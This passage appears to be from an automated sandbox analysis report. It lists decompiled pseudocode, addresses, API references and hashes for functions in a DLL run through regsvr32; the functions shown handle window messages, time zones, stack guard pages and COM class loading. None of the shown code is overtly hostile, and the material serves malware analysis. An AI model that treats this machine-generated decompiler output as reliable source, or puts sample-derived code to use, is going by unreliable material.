								goto L29;
							}
							 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
							_push(0xc8);
							_push(0xe001);
							goto L24;
						}
					}
				} else {
					L30:
					_t62 = E10022AD5(_t116);
					if(_t62 == 0 ||  *((intOrPtr*)(_t62 + 0x64)) == 0) {
						if(_v20 == 0) {
							L35:
							if(IsWindow( *(_t116 + 0x1c)) == 0) {
								goto L38;
							}
							return E10021527(_a4);
						} else {
							goto L33;
						}
						while(1) {
							L33:
							_t115 = _v20;
							_push(_a4);
							if( *((intOrPtr*)( *_v20 + 0x100))() != 0) {
								goto L37;
							}
							_t68 = E10022A96(_t115);
							_v20 = _t68;
							if(_t68 != 0) {
								continue;
							}
							goto L35;
						}
						goto L37;
					} else {
						L38:
						__eflags = 0;
						return 0;
					}
				}
			}

























                                                                        0x1002fe23
                                                                        0x1002fe27
                                                                        0x1002fe30
                                                                        0x1003000b
                                                                        0x00000000
                                                                        0x1003000d
                                                                        0x1002fe36
                                                                        0x1002fe45
                                                                        0x1002fe4d
                                                                        0x1002fe65
                                                                        0x1002fe75
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002fe87
                                                                        0x1002fe87
                                                                        0x1002fe8c
                                                                        0x1002fe8f
                                                                        0x1002fe98
                                                                        0x1002fea2
                                                                        0x1002fea5
                                                                        0x1002feb3
                                                                        0x1002fec9
                                                                        0x1002fed0
                                                                        0x1002fed3
                                                                        0x1002fed7
                                                                        0x1002feda
                                                                        0x1002fedc
                                                                        0x1002fedf
                                                                        0x1002fee4
                                                                        0x1002fee7
                                                                        0x1002fef8
                                                                        0x1002fefc
                                                                        0x1002fefe
                                                                        0x1002ff02
                                                                        0x1002ff08
                                                                        0x1002ff0b
                                                                        0x1002ff13
                                                                        0x1002ff13
                                                                        0x1002ff0b
                                                                        0x1002feef
                                                                        0x1002feef
                                                                        0x1002feef
                                                                        0x1002ff1a
                                                                        0x1002ff84
                                                                        0x1002ff8a
                                                                        0x1002ff8d
                                                                        0x1002ff95
                                                                        0x1002ff9b
                                                                        0x1002ffa9
                                                                        0x00000000
                                                                        0x1002ffa9
                                                                        0x1002ff8f
                                                                        0x1002ff93
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002ff22
                                                                        0x1002ff28
                                                                        0x1002ff42
                                                                        0x1002ff46
                                                                        0x1002ff73
                                                                        0x1002ff7a
                                                                        0x1002ffaf
                                                                        0x1002ffb5
                                                                        0x00000000
                                                                        0x1002ffb5
                                                                        0x1002ff4a
                                                                        0x1002ff50
                                                                        0x1002ff53
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002ff58
                                                                        0x1002ff5b
                                                                        0x1002ff5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002ff60
                                                                        0x1002ff65
                                                                        0x1002ff6a
                                                                        0x1002ff6c
                                                                        0x00000000
                                                                        0x1002ff6c
                                                                        0x1002ff30
                                                                        0x1002ff36
                                                                        0x1002ff3b
                                                                        0x00000000
                                                                        0x1002ff3b
                                                                        0x1002ff1a
                                                                        0x1002ffb8
                                                                        0x1002ffb8
                                                                        0x1002ffba
                                                                        0x1002ffc2
                                                                        0x1002ffce
                                                                        0x1002fff2
                                                                        0x1002fffd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002ffd0
                                                                        0x1002ffd0
                                                                        0x1002ffd0
                                                                        0x1002ffd3
                                                                        0x1002ffe2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002ffe6
                                                                        0x1002ffed
                                                                        0x1002fff0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002fff0
                                                                        0x00000000
                                                                        0x10030010
                                                                        0x10030010
                                                                        0x10030010
                                                                        0x00000000
                                                                        0x10030010
                                                                        0x1002ffc2

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: State$ClientKillParentScreenTimerWindow
                                                                        • String ID: (
                                                                        • API String ID: 1540673551-3887548279
                                                                        • Opcode ID: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                        • Instruction ID: 52046703db0e3be90f8dc11269cbd7e61114aefd04d05f62ac3939d045805729
                                                                        • Opcode Fuzzy Hash: 48477108e12e63d7028b1a71cb900cb46cf160218c0cf0ed191d138f4b4e9f6e
                                                                        • Instruction Fuzzy Hash: E4519E35A00249DFDB51DFA4D988BADBBF1EF48390F51007DE915AB2E2D7709A81CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10018E14 Relevance: 10.7, APIs: 7, Instructions: 212timeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E10018E14(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t21;
				long _t22;
				char* _t24;
				signed int _t26;
				signed int _t27;
				int _t29;
				char* _t30;
				int _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				int _t36;
				int _t39;
				int _t41;
				int _t44;
				char* _t48;
				signed int _t49;
				void* _t51;
				int _t52;
				signed int _t54;
				void* _t56;
				void* _t58;
				int _t60;
				int _t63;
				void* _t75;
				void* _t76;
				void* _t77;
				signed int _t82;
				char* _t87;
				int _t89;
				void* _t90;

				_push(0x18);
				_push(0x10042cd0);
				E10012514(__ebx, __edi, __esi);
				 *(_t90 - 0x20) = 0;
				E10013A38(__ebx, 0, 7);
				 *(_t90 - 4) = 0;
				_t63 =  *0x1004f734; // 0x0
				 *(_t90 - 0x28) = _t63;
				 *0x1004f814 = 0;
				 *0x1004ce8c =  *0x1004ce8c | 0xffffffff;
				 *0x1004ce80 =  *0x1004ce80 | 0xffffffff;
				_t87 = E1001ADE6(0x10042ccc);
				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
				if(_t87 == 0 ||  *_t87 == 0) {
					_t21 =  *0x1004f818; // 0x0
					__eflags = _t21;
					if(__eflags != 0) {
						_push(_t21);
						E100107C8(_t63, 0, _t87, __eflags);
						 *0x1004f818 = 0;
					}
					_t22 = GetTimeZoneInformation(0x1004f768);
					__eflags = _t22 - 0xffffffff;
					if(_t22 == 0xffffffff) {
						goto L31;
					} else {
						 *0x1004f814 = 1;
						_t26 = 0x1004f768->Bias; // 0x0
						_t27 = _t26 * 0x3c;
						 *0x1004cde8 = _t27;
						__eflags =  *0x1004f7ae; // 0x0
						if(__eflags != 0) {
							_t82 =  *0x1004f7bc; // 0x0
							_t39 = _t27 + _t82 * 0x3c;
							__eflags = _t39;
							 *0x1004cde8 = _t39;
						}
						__eflags =  *0x1004f802; // 0x0
						if(__eflags == 0) {
							L22:
							 *0x1004cdec = 0;
							 *0x1004cdf0 = 0;
							goto L23;
						} else {
							_t36 =  *0x1004f810; // 0x0
							__eflags = _t36;
							if(_t36 == 0) {
								goto L22;
							}
							 *0x1004cdec = 1;
							 *0x1004cdf0 = (_t36 -  *0x1004f7bc) * 0x3c;
							L23:
							_t29 = WideCharToMultiByte(_t63, 0, 0x1004f76c, 0xffffffff,  *0x1004ce78, 0x3f, 0, _t90 - 0x1c);
							__eflags = _t29;
							if(_t29 == 0) {
								L26:
								_t30 =  *0x1004ce78; // 0x1004cdf8
								 *_t30 = 0;
								L27:
								_t32 = WideCharToMultiByte(_t63, 0, 0x1004f7c0, 0xffffffff,  *0x1004ce7c, 0x3f, 0, _t90 - 0x1c);
								__eflags = _t32;
								if(_t32 == 0) {
									L30:
									_t33 =  *0x1004ce7c; // 0x1004ce38
									 *_t33 = 0;
									goto L31;
								}
								__eflags =  *(_t90 - 0x1c);
								if( *(_t90 - 0x1c) != 0) {
									goto L30;
								}
								_t34 =  *0x1004ce7c; // 0x1004ce38
								_t34[0x3f] = 0;
								goto L31;
							}
							__eflags =  *(_t90 - 0x1c);
							if( *(_t90 - 0x1c) != 0) {
								goto L26;
							}
							_t35 =  *0x1004ce78; // 0x1004cdf8
							_t35[0x3f] = 0;
							goto L27;
						}
					}
				} else {
					_t41 =  *0x1004f818; // 0x0
					if(_t41 == 0) {
						L6:
						_t44 = E100107B6(E10011820(_t87) + 1);
						 *0x1004f818 = _t44;
						if(_t44 == 0) {
							L31:
							_t24 = E1001095E(_t90 - 0x10, 0xffffffff);
							L47:
							return E1001254F(_t24);
						}
						E10017B90(_t44, _t87);
						_pop(_t75);
						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
						E1001902F();
						E10019E20( *0x1004ce78, _t87, 3);
						_t48 =  *0x1004ce78; // 0x1004cdf8
						_t48[3] = 0;
						_t89 = _t87 + 3;
						if( *_t89 == 0x2d) {
							 *(_t90 - 0x20) = 1;
							_t89 = _t89 + 1;
						}
						_t49 = E10012749(_t63, _t75, _t90, _t89);
						_pop(_t76);
						 *0x1004cde8 = _t49 * 0xe10;
						while(1) {
							_t51 =  *_t89;
							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
								break;
							}
							_t89 = _t89 + 1;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							L42:
							__eflags =  *(_t90 - 0x20);
							if( *(_t90 - 0x20) != 0) {
								 *0x1004cde8 =  ~( *0x1004cde8);
							}
							_t52 =  *_t89;
							 *0x1004cdec = _t52;
							__eflags = _t52;
							if(_t52 == 0) {
								_t24 =  *0x1004ce7c; // 0x1004ce38
								 *_t24 = 0;
							} else {
								E10019E20( *0x1004ce7c, _t89, 3);
								_t24 =  *0x1004ce7c; // 0x1004ce38
								_t24[3] = 0;
							}
							goto L47;
						}
						_t89 = _t89 + 1;
						_t54 = E10012749(0x30, _t76, _t90, _t89);
						_pop(_t77);
						 *0x1004cde8 =  *0x1004cde8 + _t54 * 0x3c;
						while(1) {
							_t56 =  *_t89;
							__eflags = _t56 - 0x30;
							if(_t56 < 0x30) {
								break;
							}
							__eflags = _t56 - 0x39;
							if(_t56 > 0x39) {
								break;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							goto L42;
						}
						_t89 = _t89 + 1;
						 *0x1004cde8 =  *0x1004cde8 + E10012749(0x30, _t77, _t90, _t89);
						while(1) {
							_t58 =  *_t89;
							__eflags = _t58 - 0x30;
							if(_t58 < 0x30) {
								goto L42;
							}
							__eflags = _t58 - 0x39;
							if(_t58 > 0x39) {
								goto L42;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						goto L42;
					}
					if(E10016D00(_t87, _t41) == 0) {
						goto L31;
					} else {
						_t60 =  *0x1004f818; // 0x0
						_t99 = _t60;
						if(_t60 != 0) {
							_push(_t60);
							E100107C8(_t63, 0, _t87, _t99);
						}
						goto L6;
					}
				}
			}


































                                                                        0x10018e14
                                                                        0x10018e16
                                                                        0x10018e1b
                                                                        0x10018e22
                                                                        0x10018e27
                                                                        0x10018e2d
                                                                        0x10018e30
                                                                        0x10018e36
                                                                        0x10018e39
                                                                        0x10018e3f
                                                                        0x10018e46
                                                                        0x10018e58
                                                                        0x10018e5a
                                                                        0x10018e5f
                                                                        0x10018f1d
                                                                        0x10018f22
                                                                        0x10018f24
                                                                        0x10018f26
                                                                        0x10018f27
                                                                        0x10018f2d
                                                                        0x10018f2d
                                                                        0x10018f38
                                                                        0x10018f3e
                                                                        0x10018f41
                                                                        0x00000000
                                                                        0x10018f47
                                                                        0x10018f4a
                                                                        0x10018f50
                                                                        0x10018f55
                                                                        0x10018f58
                                                                        0x10018f5d
                                                                        0x10018f64
                                                                        0x10018f66
                                                                        0x10018f6f
                                                                        0x10018f6f
                                                                        0x10018f71
                                                                        0x10018f71
                                                                        0x10018f76
                                                                        0x10018f7d
                                                                        0x10018f9e
                                                                        0x10018f9e
                                                                        0x10018fa4
                                                                        0x00000000
                                                                        0x10018f7f
                                                                        0x10018f7f
                                                                        0x10018f84
                                                                        0x10018f86
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018f88
                                                                        0x10018f97
                                                                        0x10018faa
                                                                        0x10018fc6
                                                                        0x10018fc8
                                                                        0x10018fca
                                                                        0x10018fdc
                                                                        0x10018fdc
                                                                        0x10018fe1
                                                                        0x10018fe4
                                                                        0x10018ffa
                                                                        0x10018ffc
                                                                        0x10018ffe
                                                                        0x10019010
                                                                        0x10019010
                                                                        0x10019015
                                                                        0x00000000
                                                                        0x10019015
                                                                        0x10019000
                                                                        0x10019003
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019005
                                                                        0x1001900a
                                                                        0x00000000
                                                                        0x1001900a
                                                                        0x10018fcc
                                                                        0x10018fcf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018fd1
                                                                        0x10018fd6
                                                                        0x00000000
                                                                        0x10018fd6
                                                                        0x10018f7d
                                                                        0x10018e6e
                                                                        0x10018e6e
                                                                        0x10018e75
                                                                        0x10018e98
                                                                        0x10018ea0
                                                                        0x10018ea7
                                                                        0x10018eae
                                                                        0x10019018
                                                                        0x1001901e
                                                                        0x100190b6
                                                                        0x100190bb
                                                                        0x100190bb
                                                                        0x10018eb6
                                                                        0x10018ebc
                                                                        0x10018ebd
                                                                        0x10018ec1
                                                                        0x10018ecf
                                                                        0x10018ed7
                                                                        0x10018edc
                                                                        0x10018ee0
                                                                        0x10018ee6
                                                                        0x10018ee8
                                                                        0x10018eef
                                                                        0x10018eef
                                                                        0x10018ef1
                                                                        0x10018ef6
                                                                        0x10018efd
                                                                        0x10018f04
                                                                        0x10018f04
                                                                        0x10018f08
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018f1a
                                                                        0x10018f1a
                                                                        0x10019038
                                                                        0x1001903b
                                                                        0x1001907b
                                                                        0x1001907b
                                                                        0x1001907e
                                                                        0x10019080
                                                                        0x10019080
                                                                        0x10019086
                                                                        0x10019089
                                                                        0x1001908e
                                                                        0x10019090
                                                                        0x100190ae
                                                                        0x100190b3
                                                                        0x10019092
                                                                        0x1001909b
                                                                        0x100190a3
                                                                        0x100190a8
                                                                        0x100190a8
                                                                        0x00000000
                                                                        0x10019090
                                                                        0x1001903d
                                                                        0x1001903f
                                                                        0x10019044
                                                                        0x10019048
                                                                        0x10019055
                                                                        0x10019055
                                                                        0x10019057
                                                                        0x10019059
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019050
                                                                        0x10019052
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019054
                                                                        0x10019054
                                                                        0x10019054
                                                                        0x1001905b
                                                                        0x1001905e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019060
                                                                        0x10019068
                                                                        0x10019075
                                                                        0x10019075
                                                                        0x10019077
                                                                        0x10019079
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019070
                                                                        0x10019072
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10019074
                                                                        0x10019074
                                                                        0x10019074
                                                                        0x00000000
                                                                        0x10019075
                                                                        0x10018e82
                                                                        0x00000000
                                                                        0x10018e88
                                                                        0x10018e88
                                                                        0x10018e8d
                                                                        0x10018e8f
                                                                        0x10018e91
                                                                        0x10018e92
                                                                        0x10018e97
                                                                        0x00000000
                                                                        0x10018e8f
                                                                        0x10018e82

                                                                        APIs
                                                                        • __lock.LIBCMT ref: 10018E27
                                                                          • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                        • _strlen.LIBCMT ref: 10018E99
                                                                        • _strncpy.LIBCMT ref: 10018ECF
                                                                          • Part of subcall function 100107C8: __lock.LIBCMT ref: 100107E6
                                                                          • Part of subcall function 100107C8: RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                        • GetTimeZoneInformation.KERNEL32(1004F768,10042CD0,00000018,10019429,10042CE0,00000008,10013474,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 10018F38
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F76C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FC6
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F7C0,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FFA
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strlen_strncpy
                                                                        • String ID:
                                                                        • API String ID: 634650903-0
                                                                        • Opcode ID: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                        • Instruction ID: 7381ce5ac415a33791fc082bffc14b542c5be3190c63e6ff879a0c337f862410
                                                                        • Opcode Fuzzy Hash: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                        • Instruction Fuzzy Hash: F871F6308046659EF751CB299E85E593FE9EB4B360F20422EE490DF2E1D770DAC2CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10032A2D Relevance: 10.6, APIs: 7, Instructions: 67windowkeyboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 63%
                                                                        			E10032A2D(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t24;
				void* _t29;
				int _t32;
				struct HWND__* _t36;

				_push(__ecx);
				_t29 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t36 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t36 != 0) {
					_t32 = _a4 << 0x10;
					do {
						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
						_t36 = GetParent(_t36);
					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
				} else {
					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t24;
			}








                                                                        0x10032a30
                                                                        0x10032a3c
                                                                        0x10032a43
                                                                        0x10032a45
                                                                        0x10032a47
                                                                        0x10032a47
                                                                        0x10032a53
                                                                        0x10032a55
                                                                        0x10032a57
                                                                        0x10032a57
                                                                        0x10032a64
                                                                        0x10032a6e
                                                                        0x10032a71
                                                                        0x10032a9d
                                                                        0x10032a9f
                                                                        0x10032ab0
                                                                        0x10032aba
                                                                        0x10032aba
                                                                        0x10032a73
                                                                        0x10032a90
                                                                        0x10032a90
                                                                        0x10032acd

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendState$DesktopFocusParentWindow
                                                                        • String ID:
                                                                        • API String ID: 4150626516-0
                                                                        • Opcode ID: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                        • Instruction ID: b978b154d262d257bd1bf3691abd3912275a9b299a299c021808da74b3d9ae9a
                                                                        • Opcode Fuzzy Hash: 051e0aa2f5fb7665f6e7cdec1f8184b617a7b2db23034231243a49861a8400e9
                                                                        • Instruction Fuzzy Hash: BD11CA32A00B39BFE7629BA68C84E593B98EB44792F114425FE41DF141D6B0EC41D7B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10010839 Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E10010839(void* __ecx, void* __eflags) {
				void* _v8;
				long _v12;
				long _v16;
				signed char _v23;
				struct _MEMORY_BASIC_INFORMATION _v44;
				struct _SYSTEM_INFO _v80;
				void* _v92;
				void* _t29;
				int _t33;
				intOrPtr _t35;
				void* _t43;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;
				void* _t62;
				void* _t63;

				_t29 = 4;
				E10010B20(_t29, __ecx);
				_t55 = _t63;
				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
					L9:
					_t33 = 0;
				} else {
					_t46 = _v44.AllocationBase;
					GetSystemInfo( &_v80);
					_t49 = _v80.dwPageSize;
					_t35 =  *0x1004f3e0; // 0x2
					_t54 = ( !(_t49 - 1) & _t55) - _t49;
					asm("sbb esi, esi");
					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
					_v12 = _t49;
					if(_t54 < _t62) {
						goto L9;
					} else {
						if(_t35 == 1) {
							_v8 = _t54;
							goto L14;
						} else {
							_v8 = _t46;
							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
								_v8 = _v8 + _v44.RegionSize;
								if((_v44.State & 0x00001000) == 0) {
									continue;
								} else {
									_t43 = _v44.BaseAddress;
									_v8 = _t43;
									if((_v23 & 0x00000001) == 0) {
										if(_t54 >= _t43) {
											if(_t43 < _t62) {
												_v8 = _t62;
											}
											VirtualAlloc(_v8, _v12, 0x1000, 4);
											_t35 =  *0x1004f3e0; // 0x2
											L14:
											asm("sbb eax, eax");
											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
										} else {
											goto L9;
										}
									} else {
										_t33 = 1;
									}
								}
								goto L15;
							}
							goto L9;
						}
					}
				}
				L15:
				return _t33;
			}




















                                                                        0x10010844
                                                                        0x10010845
                                                                        0x1001084a
                                                                        0x1001085b
                                                                        0x100108d4
                                                                        0x100108d4
                                                                        0x1001085d
                                                                        0x1001085d
                                                                        0x10010864
                                                                        0x1001086a
                                                                        0x1001086d
                                                                        0x10010879
                                                                        0x10010880
                                                                        0x1001088b
                                                                        0x1001088f
                                                                        0x10010892
                                                                        0x00000000
                                                                        0x10010894
                                                                        0x10010897
                                                                        0x100108f5
                                                                        0x00000000
                                                                        0x10010899
                                                                        0x10010899
                                                                        0x100108a1
                                                                        0x100108b7
                                                                        0x100108bd
                                                                        0x00000000
                                                                        0x100108bf
                                                                        0x100108c3
                                                                        0x100108c6
                                                                        0x100108c9
                                                                        0x100108d2
                                                                        0x100108da
                                                                        0x100108dc
                                                                        0x100108dc
                                                                        0x100108e8
                                                                        0x100108ee
                                                                        0x100108f8
                                                                        0x100108fb
                                                                        0x1001090e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100108cb
                                                                        0x100108cd
                                                                        0x100108cd
                                                                        0x100108c9
                                                                        0x00000000
                                                                        0x100108bd
                                                                        0x00000000
                                                                        0x100108a1
                                                                        0x10010897
                                                                        0x10010892
                                                                        0x10010914
                                                                        0x1001091b

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 10010853
                                                                        • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10010864
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 100108AA
                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 100108E8
                                                                        • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 1001090E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                        • String ID:
                                                                        • API String ID: 4136887677-0
                                                                        • Opcode ID: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                        • Instruction ID: ea62dba494344a01c7efc91e140871f3e8746f8623a2ca282db0dc9e1cf87e08
                                                                        • Opcode Fuzzy Hash: 71a51d1d86ecf8343d385652834c01b8084f8671a74ced250a72b247972f9a76
                                                                        • Instruction Fuzzy Hash: 60316D32E0425DEBEF10CBA8CD85AED7BB8EB05355F110165F981EB191DBB09A809B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10025CEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E10025CEC(void* __ecx, void* __eflags) {
				intOrPtr* _t21;
				void* _t25;
				struct HINSTANCE__* _t26;
				_Unknown_base(*)()* _t30;
				void* _t39;
				CHAR* _t40;
				void* _t42;
				signed int* _t43;
				void* _t44;
				void* _t46;

				E10011BF0(0x1003acec, _t46);
				_t43 =  *(_t46 + 0x10);
				 *_t43 =  *_t43 & 0x00000000;
				E10025C6A(_t46 - 0x10,  *((intOrPtr*)(_t46 + 8)));
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				_t21 = E100243B2();
				_t38 =  *_t21;
				 *(_t46 + 0x10) =  *((intOrPtr*)( *_t21 + 0xc))(_t39, _t42, __ecx) + 0x10;
				 *(_t46 - 4) = 1;
				_t25 = E1002583A( *((intOrPtr*)(_t46 - 0x10)), _t46 + 0x10);
				_t40 =  *(_t46 + 0x10);
				if(_t25 != 0) {
					_t26 = LoadLibraryA(_t40);
					if(_t26 == 0) {
						goto L1;
					}
					_t30 = GetProcAddress(_t26, "DllGetClassObject");
					if(_t30 == 0) {
						_t44 = 0x800401f9;
					} else {
						_t44 =  *_t30( *((intOrPtr*)(_t46 + 8)),  *((intOrPtr*)(_t46 + 0xc)), _t43);
					}
					L6:
					E100014B0(_t40 - 0x10, _t38);
					E100014B0( *((intOrPtr*)(_t46 - 0x10)) + 0xfffffff0, _t38);
					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
					return _t44;
				}
				L1:
				_t44 = 0x80040154;
				goto L6;
			}













                                                                        0x10025cf1
                                                                        0x10025cf8
                                                                        0x10025cfb
                                                                        0x10025d06
                                                                        0x10025d0b
                                                                        0x10025d0f
                                                                        0x10025d14
                                                                        0x10025d1e
                                                                        0x10025d28
                                                                        0x10025d2c
                                                                        0x10025d33
                                                                        0x10025d36
                                                                        0x10025d40
                                                                        0x10025d48
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10025d50
                                                                        0x10025d58
                                                                        0x10025d67
                                                                        0x10025d5a
                                                                        0x10025d63
                                                                        0x10025d63
                                                                        0x10025d6c
                                                                        0x10025d6f
                                                                        0x10025d7a
                                                                        0x10025d86
                                                                        0x10025d8e
                                                                        0x10025d8e
                                                                        0x10025d38
                                                                        0x10025d38
                                                                        0x00000000

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10025CF1
                                                                          • Part of subcall function 10025C6A: wsprintfA.USER32 ref: 10025CC5
